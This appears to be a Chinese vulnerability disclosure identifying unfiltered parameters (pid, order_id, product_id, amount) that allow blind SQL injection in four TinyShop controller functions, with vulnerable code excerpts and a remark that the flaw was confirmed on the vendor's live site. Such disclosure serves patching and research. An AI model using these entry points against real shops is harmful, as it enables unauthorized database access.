TinyShop 多处SQL注入漏洞

### 简要描述： 只看了2个文件。官网测试成功。 ### 详细说明： protected\controllers\simple.php 1 ``` public function order_info(){ $id = Filter::int(Req::args('id')); $product_id = Req::args('pid'); $type = Req::args("type"); if($this->checkOnline()){ if($type=='groupbuy'){ $model = new Model("groupbuy as gb"); $item = $model->join("left join goods as go on gb.goods_id=go.id left join products as pr on pr.goods_id=gb.goods_id")->fields("*,pr.id as product_id,pr.store_nums")->where("gb.id=$id and pr.id=$product_id")->find(); ``` pid没有过滤 无单引号 直接注入。不能报错，所以只能盲注。工具跑下。 官网： [<img src="https://images.seebug.org/upload/201406/22074043480903bed7e4289713db06de41ff2564.jpg" alt="tt1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/22074043480903bed7e4289713db06de41ff2564.jpg) 2 ``` public function order_status(){ if($this->checkOnline()){ $order_id = Req::get("order_id"); if($order_id){ $order = $this->model->table("order as od")->join("left join payment as pa on od.payment= pa.id")->fields("od.id,od.order_no,od.payment,od.pay_status,od.order_amount,pa.pay_name as payname,od.type")->where("od.id=$order_id and od.status<4 and od.user_id = ".$this->user['id'])->find(); if($order){ ``` order_id 没有过滤 同样是盲注. 3 ``` public function order_act(){ if($this->checkOnline()){ $address_id = Filter::int(Req::args('address_id')); $payment_id = Filter::int(Req::args('payment_id')); $prom_id = Filter::int(Req::args('prom_id')); $is_invoice = Filter::int(Req::args('is_invoice')); $invoice_type = Filter::int(Req::args('invoice_type')); $invoice_title = Filter::int(Req::args('invoice_title')); $user_remark = Filter::txt(Req::args('user_remark')); $voucher_id = Filter::int(Req::args('voucher')); //非普通促销信息 $type = Req::args("type"); $id = Filter::int(Req::args('id')); $product_id = Req::args('product_id'); $buy_num = Req::args('buy_num'); if(!$address_id || !$payment_id){ if(is_array($product_id))$product_id = implode('-', $product_id); $data = Req::args(); if(!$address_id) $data['msg'] = array('fail',"必需选择收货地址，才能确认订单。"); else $data['msg'] = array('fail',"必需选择支付方式，才能确认订单。"); if($type==null)$this->redirect("order",false,$data); else { unset($data['act']); Req::args('pid',$product_id); Req::args('id',$id); unset($_GET['act']); Req::args('type',$type); Req::args('msg',$data['msg']); $this->redirect("/simple/order_info",true,Req::args()); } exit; } //订单类型: 0普通订单 1团购订单 2限时抢购 3捆绑促销 $order_type = 0; $model = new Model(''); //团购处理 if($type=="groupbuy"){ $product_id = $product_id[0]; $num = $buy_num[0]; $item = $model->table("groupbuy as gb")->join("left join goods as go on gb.goods_id=go.id left join products as pr on pr.id=$product_id")->fields("*,pr.id as product_id,pr.spec")->where("gb.id=$id")->find(); $order_products = ..... ``` product_id 参数没有过滤。 4 ``` public function get_voucher(){ $page = Req::args("page"); $amount = Req::args("amount"); $where = "user_id = ".$this->user['id']." and is_send = 1"; $where .= " and status = 0 and '".date("Y-m-d H:i:s")."' <=end_time and '".date("Y-m-d H:i:s")."' >=start_time and money<=".$amount; ``` $amount 上面四个 注册用户后登入，盲注的话，工具跑下就可以了（如第一处 示例所以）。 ### 漏洞证明： [<img src="https://images.seebug.org/upload/201406/22074043480903bed7e4289713db06de41ff2564.jpg" alt="tt1.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201406/22074043480903bed7e4289713db06de41ff2564.jpg)